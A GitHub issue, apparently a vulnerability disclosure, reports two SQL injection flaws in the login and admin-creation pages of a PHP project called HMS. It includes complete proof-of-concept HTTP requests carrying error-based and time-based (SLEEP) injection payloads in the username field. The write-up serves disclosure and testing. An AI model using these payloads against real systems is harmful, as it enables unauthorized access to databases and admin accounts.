Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

HMS has two SQL injection vulnerabilities #1

Closed
huclilu opened this issue Nov 9, 2022 · 0 comments
Closed

HMS has two SQL injection vulnerabilities #1

huclilu opened this issue Nov 9, 2022 · 0 comments

Comments

@huclilu
Copy link

huclilu commented Nov 9, 2022
edited
Loading

Hello, my brother

HMS has two SQL injection vulnerabilities

Building environment: Apace2.4.39; MySQL5.7.26; PHP7.3.4

1.SQL injection vulnerability exists in adminlogin.php

In admin/adminlogin.php, line 6 - line 34

The front end post requests to transfer the uname and pass to the back end and assign values to $username and $password respectively.

Without filtering, directly bring $username and $password into the database for verification with the username and password in the database.

However, the variable is controllable, and the account and password entered in the input box are brought into the database to execute SQL statements, resulting in SQL injection vulnerabilities.

1.We can use sqlmap to validate

2.Manual SQL injection proof

  • POC
POST /adminlogin.php HTTP/1.1
Host: vulhms.test
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhms.test/adminlogin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=p8jp2ja2hfplhfopqh577o2nd1
Connection: close

uname=' OR (SELECT 12 FROM(SELECT COUNT(*),CONCAT(USER(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ace&pass=admin123&login=Login

2.SQL injection vulnerability in admin.php

In admin/admin In PHP, uname and pass are assigned to variables $uname and $pass, which are then brought into the database, causing SQL injection vulnerabilities.

1.We can use sqlmap to validate

2.Manual SQL injection proof

  • SQL injection delay 5s

  • SQL injection delay 10s

POC:

POST /admin/admin.php HTTP/1.1
Host: vulhms.test
Content-Length: 373
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhms.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryANszhVvLtYgiU33l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhms.test/admin/admin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=p8jp2ja2hfplhfopqh577o2nd1
Connection: close

------WebKitFormBoundaryANszhVvLtYgiU33l
Content-Disposition: form-data; name="uname"

admin' RLIKE SLEEP(5) AND 'ace'='ace
------WebKitFormBoundaryANszhVvLtYgiU33l
Content-Disposition: form-data; name="pass"

123123
------WebKitFormBoundaryANszhVvLtYgiU33l
Content-Disposition: form-data; name="add"

Add New Admin
------WebKitFormBoundaryANszhVvLtYgiU33l--
@huclilu huclilu closed this as completed Nov 13, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@huclilu